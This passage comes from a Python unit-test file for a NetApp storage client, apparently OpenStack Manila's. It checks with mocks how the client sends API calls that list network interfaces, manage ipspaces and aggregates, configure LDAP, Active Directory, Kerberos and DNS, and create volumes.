    net_interface_get_args = {
        'desired-attributes': {
            'net-interface-info': {
                'interface-name': None,
            }
        }
    }
    result = self.client.list_network_interfaces()
    self.client.send_iter_request.assert_has_calls([
        mock.call('net-interface-get-iter', net_interface_get_args)])
    self.assertSequenceEqual(fake.LIF_NAMES, result)
def test_list_network_interfaces_not_found(self):
    """list_network_interfaces returns [] when no LIFs exist."""
    api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
    self.mock_object(self.client,
                     'send_request',
                     mock.Mock(return_value=api_response))
    result = self.client.list_network_interfaces()
    self.assertListEqual([], result)
def test_get_network_interfaces(self):
    """get_network_interfaces with no filter passes None as query args."""
    api_response = netapp_api.NaElement(
        fake.NET_INTERFACE_GET_ITER_RESPONSE)
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(return_value=api_response))
    result = self.client.get_network_interfaces()
    self.client.send_iter_request.assert_has_calls([
        mock.call('net-interface-get-iter', None)])
    self.assertSequenceEqual(fake.LIFS, result)
def test_get_network_interfaces_filtered_by_protocol(self):
    """A protocol filter is lowercased into the data-protocol query."""
    api_response = netapp_api.NaElement(
        fake.NET_INTERFACE_GET_ITER_RESPONSE_NFS)
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(return_value=api_response))
    result = self.client.get_network_interfaces(protocols=['NFS'])
    net_interface_get_args = {
        'query': {
            'net-interface-info': {
                'data-protocols': {
                    'data-protocol': 'nfs',
                }
            }
        }
    }
    self.client.send_iter_request.assert_has_calls([
        mock.call('net-interface-get-iter', net_interface_get_args)])
    self.assertListEqual(fake.NFS_LIFS, result)
def test_get_network_interfaces_not_found(self):
    """get_network_interfaces returns [] for an empty response."""
    api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(return_value=api_response))
    result = self.client.get_network_interfaces()
    self.client.send_iter_request.assert_has_calls([
        mock.call('net-interface-get-iter', None)])
    self.assertListEqual([], result)
def test_get_ipspaces(self):
    """get_ipspaces filters by name when ipspace_name is given."""
    self.client.features.add_feature('IPSPACES')
    api_response = netapp_api.NaElement(
        fake.NET_IPSPACES_GET_ITER_RESPONSE)
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(return_value=api_response))
    result = self.client.get_ipspaces(ipspace_name=fake.IPSPACE_NAME)
    net_ipspaces_get_iter_args = {
        'query': {
            'net-ipspaces-info': {
                'ipspace': fake.IPSPACE_NAME,
            },
        },
    }
    self.client.send_iter_request.assert_has_calls([
        mock.call('net-ipspaces-get-iter', net_ipspaces_get_iter_args)])
    self.assertEqual(fake.IPSPACES, result)
def test_get_ipspaces_not_found(self):
    """Without a name filter, get_ipspaces sends empty args; [] on empty."""
    self.client.features.add_feature('IPSPACES')
    api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(return_value=api_response))
    result = self.client.get_ipspaces()
    net_ipspaces_get_iter_args = {}
    self.client.send_iter_request.assert_has_calls([
        mock.call('net-ipspaces-get-iter', net_ipspaces_get_iter_args)])
    self.assertEqual([], result)
def test_get_ipspaces_not_supported(self):
    """Without the IPSPACES feature no API call is made at all."""
    self.mock_object(self.client, 'send_iter_request')
    result = self.client.get_ipspaces()
    self.assertFalse(self.client.send_iter_request.called)
    self.assertEqual([], result)
@ddt.data((fake.NET_IPSPACES_GET_ITER_RESPONSE, True),
          (fake.NO_RECORDS_RESPONSE, False))
@ddt.unpack
def test_ipspace_exists(self, api_response, expected):
    """ipspace_exists is True iff the get-iter returns a record."""
    self.client.features.add_feature('IPSPACES')
    api_response = netapp_api.NaElement(api_response)
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(return_value=api_response))
    result = self.client.ipspace_exists(fake.IPSPACE_NAME)
    net_ipspaces_get_iter_args = {
        'query': {
            'net-ipspaces-info': {
                'ipspace': fake.IPSPACE_NAME,
            },
        },
        # Only the name is requested; existence is all that matters here.
        'desired-attributes': {
            'net-ipspaces-info': {
                'ipspace': None,
            },
        },
    }
    self.client.send_iter_request.assert_has_calls([
        mock.call('net-ipspaces-get-iter', net_ipspaces_get_iter_args)])
    self.assertEqual(expected, result)
def test_ipspace_exists_not_supported(self):
    """Without the IPSPACES feature, ipspace_exists is always False."""
    result = self.client.ipspace_exists(fake.IPSPACE_NAME)
    self.assertFalse(result)
def test_create_ipspace(self):
    """create_ipspace issues net-ipspaces-create with the given name."""
    self.mock_object(self.client, 'send_request')
    self.client.create_ipspace(fake.IPSPACE_NAME)
    net_ipspaces_create_args = {'ipspace': fake.IPSPACE_NAME}
    self.client.send_request.assert_has_calls([
        mock.call('net-ipspaces-create', net_ipspaces_create_args)])
def test_delete_ipspace(self):
    """delete_ipspace first drops broadcast domains, then the ipspace."""
    mock_delete_broadcast_domains_for_ipspace = self.mock_object(
        self.client, '_delete_broadcast_domains_for_ipspace')
    self.mock_object(self.client, 'send_request')
    self.client.delete_ipspace(fake.IPSPACE_NAME)
    net_ipspaces_destroy_args = {'ipspace': fake.IPSPACE_NAME}
    mock_delete_broadcast_domains_for_ipspace.assert_called_once_with(
        fake.IPSPACE_NAME)
    self.client.send_request.assert_has_calls([
        mock.call('net-ipspaces-destroy', net_ipspaces_destroy_args)])
def test_add_vserver_to_ipspace(self):
    """Assigning a vserver passes both names to the assign-vserver API."""
    self.mock_object(self.client, 'send_request')
    self.client.add_vserver_to_ipspace(fake.IPSPACE_NAME,
                                       fake.VSERVER_NAME)
    net_ipspaces_assign_vserver_args = {
        'ipspace': fake.IPSPACE_NAME,
        'vserver': fake.VSERVER_NAME
    }
    self.client.send_request.assert_has_calls([
        mock.call('net-ipspaces-assign-vserver',
                  net_ipspaces_assign_vserver_args)])
def test_get_node_for_aggregate(self):
    """The home node is extracted from the aggregate's ownership info."""
    api_response = netapp_api.NaElement(
        fake.AGGR_GET_NODE_RESPONSE).get_child_by_name(
        'attributes-list').get_children()
    self.mock_object(self.client,
                     '_get_aggregates',
                     mock.Mock(return_value=api_response))
    result = self.client.get_node_for_aggregate(fake.SHARE_AGGREGATE_NAME)
    desired_attributes = {
        'aggr-attributes': {
            'aggregate-name': None,
            'aggr-ownership-attributes': {
                'home-name': None,
            },
        },
    }
    self.client._get_aggregates.assert_has_calls([
        mock.call(
            aggregate_names=[fake.SHARE_AGGREGATE_NAME],
            desired_attributes=desired_attributes)])
    self.assertEqual(fake.NODE_NAME, result)
def test_get_node_for_aggregate_none_requested(self):
    """Asking for the node of no aggregate short-circuits to None."""
    result = self.client.get_node_for_aggregate(None)
    self.assertIsNone(result)
def test_get_node_for_aggregate_api_not_found(self):
    """EAPINOTFOUND (API unavailable on this system) maps to None."""
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(side_effect=self._mock_api_error(
                         netapp_api.EAPINOTFOUND)))
    result = self.client.get_node_for_aggregate(fake.SHARE_AGGREGATE_NAME)
    self.assertIsNone(result)
def test_get_node_for_aggregate_api_error(self):
    """Any other API error propagates to the caller unchanged."""
    self.mock_object(self.client,
                     'send_iter_request',
                     self._mock_api_error())
    self.assertRaises(netapp_api.NaApiError,
                      self.client.get_node_for_aggregate,
                      fake.SHARE_AGGREGATE_NAME)
def test_get_node_for_aggregate_not_found(self):
    """An aggregate that is not reported by ONTAP yields None."""
    api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(return_value=api_response))
    result = self.client.get_node_for_aggregate(fake.SHARE_AGGREGATE_NAME)
    self.assertIsNone(result)
def test_get_cluster_aggregate_capacities(self):
    """Space attributes are mapped to available/total/used per aggregate."""
    api_response = netapp_api.NaElement(
        fake.AGGR_GET_SPACE_RESPONSE).get_child_by_name(
        'attributes-list').get_children()
    self.mock_object(self.client,
                     '_get_aggregates',
                     mock.Mock(return_value=api_response))
    result = self.client.get_cluster_aggregate_capacities(
        fake.SHARE_AGGREGATE_NAMES)
    desired_attributes = {
        'aggr-attributes': {
            'aggregate-name': None,
            'aggr-space-attributes': {
                'size-available': None,
                'size-total': None,
                'size-used': None,
            }
        }
    }
    self.client._get_aggregates.assert_has_calls([
        mock.call(
            aggregate_names=fake.SHARE_AGGREGATE_NAMES,
            desired_attributes=desired_attributes)])
    # Byte values below come from fake.AGGR_GET_SPACE_RESPONSE.
    expected = {
        fake.SHARE_AGGREGATE_NAMES[0]: {
            'available': 45670400,
            'total': 943718400,
            'used': 898048000,
        },
        fake.SHARE_AGGREGATE_NAMES[1]: {
            'available': 4267659264,
            'total': 7549747200,
            'used': 3282087936,
        },
    }
    self.assertDictEqual(expected, result)
def test_get_cluster_aggregate_capacities_not_found(self):
    """No matching aggregates produces an empty capacity dict."""
    api_response = netapp_api.NaElement('none').get_children()
    self.mock_object(self.client,
                     '_get_aggregates',
                     mock.Mock(return_value=api_response))
    result = self.client.get_cluster_aggregate_capacities(
        fake.SHARE_AGGREGATE_NAMES)
    self.assertEqual({}, result)
def test_get_cluster_aggregate_capacities_none_requested(self):
    """An empty aggregate list short-circuits to an empty dict."""
    result = self.client.get_cluster_aggregate_capacities([])
    self.assertEqual({}, result)
def test_get_vserver_aggregate_capacities(self):
    """Vserver-scoped capacities come from the vserver-aggr-info list."""
    api_response = netapp_api.NaElement(fake.VSERVER_GET_RESPONSE)
    self.mock_object(self.vserver_client,
                     'send_request',
                     mock.Mock(return_value=api_response))
    result = self.vserver_client.get_vserver_aggregate_capacities()
    vserver_args = {
        'desired-attributes': {
            'vserver-info': {
                'vserver-name': None,
                'vserver-aggr-info-list': {
                    'vserver-aggr-info': {
                        'aggr-name': None,
                        'aggr-availsize': None
                    }
                }
            }
        }
    }
    self.vserver_client.send_request.assert_has_calls([
        mock.call('vserver-get', vserver_args)])
    self.assertDictEqual(fake.VSERVER_AGGREGATES, result)
def test_get_vserver_aggregate_capacities_partial_request(self):
    """Requesting specific aggregates filters the returned dict."""
    api_response = netapp_api.NaElement(fake.VSERVER_GET_RESPONSE)
    self.mock_object(self.vserver_client,
                     'send_request',
                     mock.Mock(return_value=api_response))
    result = self.vserver_client.get_vserver_aggregate_capacities(
        fake.SHARE_AGGREGATE_NAMES[0])
    expected = {fake.SHARE_AGGREGATE_NAMES[0]:
                fake.VSERVER_AGGREGATES[fake.SHARE_AGGREGATE_NAMES[0]]}
    self.assertDictEqual(expected, result)
def test_get_vserver_aggregate_capacities_aggregate_not_found(self):
    """A vserver with no aggregates logs a warning and returns {}."""
    api_response = netapp_api.NaElement(
        fake.VSERVER_GET_RESPONSE_NO_AGGREGATES)
    self.mock_object(self.vserver_client,
                     'send_request',
                     mock.Mock(return_value=api_response))
    result = self.vserver_client.get_vserver_aggregate_capacities()
    self.assertDictEqual({}, result)
    self.assertEqual(1, client_cmode.LOG.warning.call_count)
def test_get_vserver_aggregate_capacities_vserver_not_found(self):
    """A missing vserver record is an error, not an empty result."""
    api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
    self.mock_object(self.vserver_client,
                     'send_request',
                     mock.Mock(return_value=api_response))
    self.assertRaises(exception.NetAppException,
                      self.vserver_client.get_vserver_aggregate_capacities)
def test_get_vserver_aggregate_capacities_none_requested(self):
    """An empty aggregate list short-circuits to an empty dict."""
    result = self.client.get_vserver_aggregate_capacities([])
    self.assertEqual({}, result)
def test_get_aggregates(self):
    """Without filters, aggr-get-iter is called with empty args."""
    api_response = netapp_api.NaElement(fake.AGGR_GET_ITER_RESPONSE)
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(return_value=api_response))
    result = self.client._get_aggregates()
    self.client.send_iter_request.assert_has_calls([
        mock.call('aggr-get-iter', {})])
    # Compare serialized XML since NaElement lacks value equality.
    self.assertListEqual(
        [aggr.to_string() for aggr in api_response.get_child_by_name(
            'attributes-list').get_children()],
        [aggr.to_string() for aggr in result])
def test_get_aggregates_with_filters(self):
    """Name filters are OR-joined ('|') into the aggregate-name query."""
    api_response = netapp_api.NaElement(fake.AGGR_GET_SPACE_RESPONSE)
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(return_value=api_response))
    desired_attributes = {
        'aggr-attributes': {
            'aggregate-name': None,
            'aggr-space-attributes': {
                'size-total': None,
                'size-available': None,
            }
        }
    }
    result = self.client._get_aggregates(
        aggregate_names=fake.SHARE_AGGREGATE_NAMES,
        desired_attributes=desired_attributes)
    aggr_get_iter_args = {
        'query': {
            'aggr-attributes': {
                'aggregate-name': '|'.join(fake.SHARE_AGGREGATE_NAMES),
            }
        },
        'desired-attributes': desired_attributes
    }
    self.client.send_iter_request.assert_has_calls([
        mock.call('aggr-get-iter', aggr_get_iter_args)])
    # Compare serialized XML since NaElement lacks value equality.
    self.assertListEqual(
        [aggr.to_string() for aggr in api_response.get_child_by_name(
            'attributes-list').get_children()],
        [aggr.to_string() for aggr in result])
def test_get_aggregates_not_found(self):
    """No records returns an empty list from _get_aggregates."""
    api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(return_value=api_response))
    result = self.client._get_aggregates()
    self.client.send_iter_request.assert_has_calls([
        mock.call('aggr-get-iter', {})])
    self.assertListEqual([], result)
def test_setup_security_services_ldap(self):
    """LDAP setup modifies the vserver name services, then configures LDAP."""
    self.mock_object(self.client, 'send_request')
    self.mock_object(self.vserver_client, 'configure_ldap')
    self.client.setup_security_services([fake.LDAP_SECURITY_SERVICE],
                                       self.vserver_client,
                                       fake.VSERVER_NAME)
    # ldap is tried before local files for both mapping and lookup.
    vserver_modify_args = {
        'name-mapping-switch': [
            {'nmswitch': 'ldap'},
            {'nmswitch': 'file'},
        ],
        'name-server-switch': [
            {'nsswitch': 'ldap'},
            {'nsswitch': 'file'},
        ],
        'vserver-name': fake.VSERVER_NAME
    }
    self.client.send_request.assert_has_calls([
        mock.call('vserver-modify', vserver_modify_args)])
    self.vserver_client.configure_ldap.assert_has_calls([
        mock.call(fake.LDAP_SECURITY_SERVICE)])
def test_setup_security_services_active_directory(self):
    """AD setup modifies name services, then configures Active Directory."""
    self.mock_object(self.client, 'send_request')
    self.mock_object(self.vserver_client, 'configure_active_directory')
    self.client.setup_security_services([fake.CIFS_SECURITY_SERVICE],
                                       self.vserver_client,
                                       fake.VSERVER_NAME)
    vserver_modify_args = {
        'name-mapping-switch': [
            {'nmswitch': 'ldap'},
            {'nmswitch': 'file'},
        ],
        'name-server-switch': [
            {'nsswitch': 'ldap'},
            {'nsswitch': 'file'},
        ],
        'vserver-name': fake.VSERVER_NAME
    }
    self.client.send_request.assert_has_calls([
        mock.call('vserver-modify', vserver_modify_args)])
    self.vserver_client.configure_active_directory.assert_has_calls([
        mock.call(fake.CIFS_SECURITY_SERVICE, fake.VSERVER_NAME)])
def test_setup_security_services_kerberos(self):
    """Kerberos setup creates the realm and configures it on the vserver."""
    self.mock_object(self.client, 'send_request')
    self.mock_object(self.client, 'create_kerberos_realm')
    self.mock_object(self.vserver_client, 'configure_kerberos')
    self.client.setup_security_services([fake.KERBEROS_SECURITY_SERVICE],
                                       self.vserver_client,
                                       fake.VSERVER_NAME)
    vserver_modify_args = {
        'name-mapping-switch': [
            {'nmswitch': 'ldap'},
            {'nmswitch': 'file'},
        ],
        'name-server-switch': [
            {'nsswitch': 'ldap'},
            {'nsswitch': 'file'},
        ],
        'vserver-name': fake.VSERVER_NAME
    }
    self.client.send_request.assert_has_calls([
        mock.call('vserver-modify', vserver_modify_args)])
    self.client.create_kerberos_realm.assert_has_calls([
        mock.call(fake.KERBEROS_SECURITY_SERVICE)])
    self.vserver_client.configure_kerberos.assert_has_calls([
        mock.call(fake.KERBEROS_SECURITY_SERVICE, fake.VSERVER_NAME)])
def test_setup_security_services_invalid(self):
    """An unknown service type raises, but only after name-service setup."""
    self.mock_object(self.client, 'send_request')
    self.assertRaises(exception.NetAppException,
                      self.client.setup_security_services,
                      [fake.INVALID_SECURITY_SERVICE],
                      self.vserver_client,
                      fake.VSERVER_NAME)
    vserver_modify_args = {
        'name-mapping-switch': [
            {'nmswitch': 'ldap'},
            {'nmswitch': 'file'},
        ],
        'name-server-switch': [
            {'nsswitch': 'ldap'},
            {'nsswitch': 'file'},
        ],
        'vserver-name': fake.VSERVER_NAME
    }
    self.client.send_request.assert_has_calls([
        mock.call('vserver-modify', vserver_modify_args)])
def test_enable_nfs(self):
    """enable_nfs turns on NFS/NFSv4.0 and opens a read-only default rule."""
    self.mock_object(self.client, 'send_request')
    self.client.enable_nfs()
    nfs_service_modify_args = {'is-nfsv40-enabled': 'true'}
    # Default export policy: world-readable ('any'), never writable.
    export_rule_create_args = {
        'client-match': '0.0.0.0/0',
        'policy-name': 'default',
        'ro-rule': {
            'security-flavor': 'any'
        },
        'rw-rule': {
            'security-flavor': 'never'
        }
    }
    self.client.send_request.assert_has_calls([
        mock.call('nfs-enable'),
        mock.call('nfs-service-modify', nfs_service_modify_args),
        mock.call('export-rule-create', export_rule_create_args)])
def test_configure_ldap(self):
    """LDAP config name is the md5 of the security service id."""
    self.mock_object(self.client, 'send_request')
    self.client.configure_ldap(fake.LDAP_SECURITY_SERVICE)
    config_name = hashlib.md5(
        six.b(fake.LDAP_SECURITY_SERVICE['id'])).hexdigest()
    ldap_client_create_args = {
        'ldap-client-config': config_name,
        'servers': {'ip-address': fake.LDAP_SECURITY_SERVICE['server']},
        'tcp-port': '389',
        'schema': 'RFC-2307',
        'bind-password': fake.LDAP_SECURITY_SERVICE['password']
    }
    ldap_config_create_args = {
        'client-config': config_name,
        'client-enabled': 'true'
    }
    self.client.send_request.assert_has_calls([
        mock.call('ldap-client-create', ldap_client_create_args),
        mock.call('ldap-config-create', ldap_config_create_args)])
def test_configure_active_directory(self):
    """AD config sets up DNS first, then creates the CIFS server."""
    self.mock_object(self.client, 'send_request')
    self.mock_object(self.client, 'configure_dns')
    self.client.configure_active_directory(fake.CIFS_SECURITY_SERVICE,
                                           fake.VSERVER_NAME)
    # CIFS server names are capped at 15 chars: first 7 + '..' + last 6.
    cifs_server = (
        fake.VSERVER_NAME[0:7] + '..' + fake.VSERVER_NAME[-6:]).upper()
    cifs_server_create_args = {
        'admin-username': fake.CIFS_SECURITY_SERVICE['user'],
        'admin-password': fake.CIFS_SECURITY_SERVICE['password'],
        'force-account-overwrite': 'true',
        'cifs-server': cifs_server,
        'domain': fake.CIFS_SECURITY_SERVICE['domain'],
    }
    self.client.configure_dns.assert_called_with(
        fake.CIFS_SECURITY_SERVICE)
    self.client.send_request.assert_has_calls([
        mock.call('cifs-server-create', cifs_server_create_args)])
def test_configure_active_directory_api_error(self):
    """API failures during CIFS setup surface as NetAppException."""
    self.mock_object(self.client, 'send_request', self._mock_api_error())
    self.mock_object(self.client, 'configure_dns')
    self.assertRaises(exception.NetAppException,
                      self.client.configure_active_directory,
                      fake.CIFS_SECURITY_SERVICE,
                      fake.VSERVER_NAME)
def test_create_kerberos_realm(self):
    """Realm creation uses the service server for admin/KDC/password roles."""
    self.mock_object(self.client, 'send_request')
    self.client.create_kerberos_realm(fake.KERBEROS_SECURITY_SERVICE)
    kerberos_realm_create_args = {
        'admin-server-ip': fake.KERBEROS_SECURITY_SERVICE['server'],
        'admin-server-port': '749',
        'clock-skew': '5',
        'comment': '',
        'config-name': fake.KERBEROS_SECURITY_SERVICE['id'],
        'kdc-ip': fake.KERBEROS_SECURITY_SERVICE['server'],
        'kdc-port': '88',
        'kdc-vendor': 'other',
        'password-server-ip': fake.KERBEROS_SECURITY_SERVICE['server'],
        'password-server-port': '464',
        # Kerberos realms are conventionally upper-case.
        'realm': fake.KERBEROS_SECURITY_SERVICE['domain'].upper()
    }
    self.client.send_request.assert_has_calls([
        mock.call('kerberos-realm-create', kerberos_realm_create_args)])
def test_create_kerberos_realm_already_present(self):
    """EDUPLICATEENTRY is tolerated (realm exists) and logged at debug."""
    self.mock_object(self.client,
                     'send_request',
                     self._mock_api_error(code=netapp_api.EDUPLICATEENTRY))
    self.client.create_kerberos_realm(fake.KERBEROS_SECURITY_SERVICE)
    kerberos_realm_create_args = {
        'admin-server-ip': fake.KERBEROS_SECURITY_SERVICE['server'],
        'admin-server-port': '749',
        'clock-skew': '5',
        'comment': '',
        'config-name': fake.KERBEROS_SECURITY_SERVICE['id'],
        'kdc-ip': fake.KERBEROS_SECURITY_SERVICE['server'],
        'kdc-port': '88',
        'kdc-vendor': 'other',
        'password-server-ip': fake.KERBEROS_SECURITY_SERVICE['server'],
        'password-server-port': '464',
        'realm': fake.KERBEROS_SECURITY_SERVICE['domain'].upper()
    }
    self.client.send_request.assert_has_calls([
        mock.call('kerberos-realm-create', kerberos_realm_create_args)])
    self.assertEqual(1, client_cmode.LOG.debug.call_count)
def test_create_kerberos_realm_api_error(self):
    """Non-duplicate API errors surface as NetAppException."""
    self.mock_object(self.client, 'send_request', self._mock_api_error())
    self.assertRaises(exception.NetAppException,
                      self.client.create_kerberos_realm,
                      fake.KERBEROS_SECURITY_SERVICE)
def test_configure_kerberos(self):
    """Kerberos is enabled on every LIF of the vserver with the same SPN."""
    self.mock_object(self.client, 'send_request')
    self.mock_object(self.client, 'configure_dns')
    self.mock_object(self.client,
                     'list_network_interfaces',
                     mock.Mock(return_value=['lif1', 'lif2']))
    self.client.configure_kerberos(
        fake.KERBEROS_SECURITY_SERVICE, fake.VSERVER_NAME)
    spn = self.client._get_kerberos_service_principal_name(
        fake.KERBEROS_SECURITY_SERVICE, fake.VSERVER_NAME)
    kerberos_config_modify_args1 = {
        'admin-password': fake.KERBEROS_SECURITY_SERVICE['password'],
        'admin-user-name': fake.KERBEROS_SECURITY_SERVICE['user'],
        'interface-name': 'lif1',
        'is-kerberos-enabled': 'true',
        'service-principal-name': spn
    }
    kerberos_config_modify_args2 = {
        'admin-password': fake.KERBEROS_SECURITY_SERVICE['password'],
        'admin-user-name': fake.KERBEROS_SECURITY_SERVICE['user'],
        'interface-name': 'lif2',
        'is-kerberos-enabled': 'true',
        'service-principal-name': spn
    }
    self.client.configure_dns.assert_called_with(
        fake.KERBEROS_SECURITY_SERVICE)
    self.client.send_request.assert_has_calls([
        mock.call('kerberos-config-modify',
                  kerberos_config_modify_args1),
        mock.call('kerberos-config-modify',
                  kerberos_config_modify_args2)])
def test_configure_kerberos_no_network_interfaces(self):
    """A vserver without LIFs cannot be kerberized; DNS is set up first."""
    self.mock_object(self.client, 'send_request')
    self.mock_object(self.client, 'configure_dns')
    self.mock_object(self.client,
                     'list_network_interfaces',
                     mock.Mock(return_value=[]))
    self.assertRaises(exception.NetAppException,
                      self.client.configure_kerberos,
                      fake.KERBEROS_SECURITY_SERVICE,
                      fake.VSERVER_NAME)
    self.client.configure_dns.assert_called_with(
        fake.KERBEROS_SECURITY_SERVICE)
def test_get_kerberos_service_principal_name(self):
    """The SPN is derived from the security service and vserver name."""
    spn = self.client._get_kerberos_service_principal_name(
        fake.KERBEROS_SECURITY_SERVICE, fake.VSERVER_NAME
    )
    self.assertEqual(fake.KERBEROS_SERVICE_PRINCIPAL_NAME, spn)
def test_configure_dns_for_active_directory(self):
    """DNS config for AD uses the service's domain and dns_ip."""
    self.mock_object(self.client, 'send_request')
    self.client.configure_dns(fake.CIFS_SECURITY_SERVICE)
    net_dns_create_args = {
        'domains': {'string': fake.CIFS_SECURITY_SERVICE['domain']},
        'name-servers': {
            'ip-address': fake.CIFS_SECURITY_SERVICE['dns_ip']
        },
        'dns-state': 'enabled'
    }
    self.client.send_request.assert_has_calls([
        mock.call('net-dns-create', net_dns_create_args)])
def test_configure_dns_for_kerberos(self):
    """DNS config for Kerberos uses the service's domain and dns_ip."""
    self.mock_object(self.client, 'send_request')
    self.client.configure_dns(fake.KERBEROS_SECURITY_SERVICE)
    net_dns_create_args = {
        'domains': {'string': fake.KERBEROS_SECURITY_SERVICE['domain']},
        'name-servers': {
            'ip-address': fake.KERBEROS_SECURITY_SERVICE['dns_ip']
        },
        'dns-state': 'enabled'
    }
    self.client.send_request.assert_has_calls([
        mock.call('net-dns-create', net_dns_create_args)])
def test_configure_dns_already_present(self):
    """EDUPLICATEENTRY (DNS already configured) is tolerated and logged."""
    self.mock_object(self.client,
                     'send_request',
                     self._mock_api_error(code=netapp_api.EDUPLICATEENTRY))
    self.client.configure_dns(fake.KERBEROS_SECURITY_SERVICE)
    net_dns_create_args = {
        'domains': {'string': fake.KERBEROS_SECURITY_SERVICE['domain']},
        'name-servers': {
            'ip-address': fake.KERBEROS_SECURITY_SERVICE['dns_ip']
        },
        'dns-state': 'enabled'
    }
    self.client.send_request.assert_has_calls([
        mock.call('net-dns-create', net_dns_create_args)])
    self.assertEqual(1, client_cmode.LOG.error.call_count)
def test_configure_dns_api_error(self):
    """Non-duplicate DNS API errors surface as NetAppException."""
    self.mock_object(self.client, 'send_request', self._mock_api_error())
    self.assertRaises(exception.NetAppException,
                      self.client.configure_dns,
                      fake.KERBEROS_SECURITY_SERVICE)
def test_create_volume(self):
    """Minimal volume create: size in GB, rw type, junction at /<name>."""
    self.mock_object(self.client, 'send_request')
    self.client.create_volume(
        fake.SHARE_AGGREGATE_NAME, fake.SHARE_NAME, 100)
    volume_create_args = {
        'containing-aggr-name': fake.SHARE_AGGREGATE_NAME,
        'size': '100g',
        'volume': fake.SHARE_NAME,
        'volume-type': 'rw',
        'junction-path': '/%s' % fake.SHARE_NAME,
    }
    self.client.send_request.assert_called_once_with('volume-create',
                                                     volume_create_args)
def test_create_volume_with_extra_specs(self):
    """Extra specs map to create args plus follow-up efficiency calls."""
    self.mock_object(self.client, 'set_volume_max_files')
    self.mock_object(self.client, 'enable_dedup')
    self.mock_object(self.client, 'enable_compression')
    self.mock_object(self.client, 'send_request')
    self.client.create_volume(
        fake.SHARE_AGGREGATE_NAME, fake.SHARE_NAME, 100,
        thin_provisioned=True, language='en-US',
        snapshot_policy='default', dedup_enabled=True,
        compression_enabled=True, max_files=5000, snapshot_reserve=15)
    volume_create_args = {
        'containing-aggr-name': fake.SHARE_AGGREGATE_NAME,
        'size': '100g',
        'volume': fake.SHARE_NAME,
        'junction-path': '/%s' % fake.SHARE_NAME,
        # thin_provisioned=True disables the space guarantee.
        'space-reserve': 'none',
        'language-code': 'en-US',
        'volume-type': 'rw',
        'snapshot-policy': 'default',
        'percentage-snapshot-reserve': '15',
    }
    self.client.send_request.assert_called_with('volume-create',
                                                volume_create_args)
    # max_files, dedup, and compression are applied after creation.
    self.client.set_volume_max_files.assert_called_once_with(
        fake.SHARE_NAME, fake.MAX_FILES)
    self.client.enable_dedup.assert_called_once_with(fake.SHARE_NAME)
    self.client.enable_compression.assert_called_once_with(fake.SHARE_NAME)
def test_enable_dedup(self):
    """enable_dedup issues sis-enable against /vol/<share>."""
    self.mock_object(self.client, 'send_request')
    self.client.enable_dedup(fake.SHARE_NAME)
    sis_enable_args = {'path': '/vol/%s' % fake.SHARE_NAME}
    self.client.send_request.assert_called_once_with('sis-enable',
                                                     sis_enable_args)
def test_disable_dedup(self):
    """disable_dedup issues sis-disable against /vol/<share>."""
    self.mock_object(self.client, 'send_request')
    self.client.disable_dedup(fake.SHARE_NAME)
    sis_disable_args = {'path': '/vol/%s' % fake.SHARE_NAME}
    self.client.send_request.assert_called_once_with('sis-disable',
                                                     sis_disable_args)
def test_enable_compression(self):
    """enable_compression flips enable-compression via sis-set-config."""
    self.mock_object(self.client, 'send_request')
    self.client.enable_compression(fake.SHARE_NAME)
    sis_set_config_args = {
        'path': '/vol/%s' % fake.SHARE_NAME,
        'enable-compression': 'true'
    }
    self.client.send_request.assert_called_once_with('sis-set-config',
                                                     sis_set_config_args)
def test_disable_compression(self):
    """disable_compression clears enable-compression via sis-set-config."""
    self.mock_object(self.client, 'send_request')
    self.client.disable_compression(fake.SHARE_NAME)
    sis_set_config_args = {
        'path': '/vol/%s' % fake.SHARE_NAME,
        'enable-compression': 'false'
    }
    self.client.send_request.assert_called_once_with('sis-set-config',
                                                     sis_set_config_args)
def test_get_volume_efficiency_status(self):
    """sis state and compression flag map to a dedupe/compression dict."""
    api_response = netapp_api.NaElement(fake.SIS_GET_ITER_RESPONSE)
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(return_value=api_response))
    result = self.client.get_volume_efficiency_status(fake.SHARE_NAME)
    sis_get_iter_args = {
        'query': {
            'sis-status-info': {
                'path': '/vol/%s' % fake.SHARE_NAME,
            },
        },
        'desired-attributes': {
            'sis-status-info': {
                'state': None,
                'is-compression-enabled': None,
            },
        },
    }
    self.client.send_iter_request.assert_has_calls([
        mock.call('sis-get-iter', sis_get_iter_args)])
    expected = {'dedupe': True, 'compression': True}
    self.assertDictEqual(expected, result)
def test_get_volume_efficiency_status_not_found(self):
    """No sis record means both efficiency features report False."""
    api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(return_value=api_response))
    result = self.client.get_volume_efficiency_status(fake.SHARE_NAME)
    expected = {'dedupe': False, 'compression': False}
    self.assertDictEqual(expected, result)
def test_set_volume_max_files(self):
    """max files is set through volume-modify-iter's inode attributes."""
    self.mock_object(self.client, 'send_request')
    self.client.set_volume_max_files(fake.SHARE_NAME, fake.MAX_FILES)
    volume_modify_iter_api_args = {
        'query': {
            'volume-attributes': {
                'volume-id-attributes': {
                    'name': fake.SHARE_NAME,
                },
            },
        },
        'attributes': {
            'volume-attributes': {
                'volume-inode-attributes': {
                    'files-total': fake.MAX_FILES,
                },
            },
        },
    }
    self.client.send_request.assert_called_once_with(
        'volume-modify-iter', volume_modify_iter_api_args)
def test_set_volume_name(self):
    """set_volume_name issues volume-rename with old and new names."""
    self.mock_object(self.client, 'send_request')
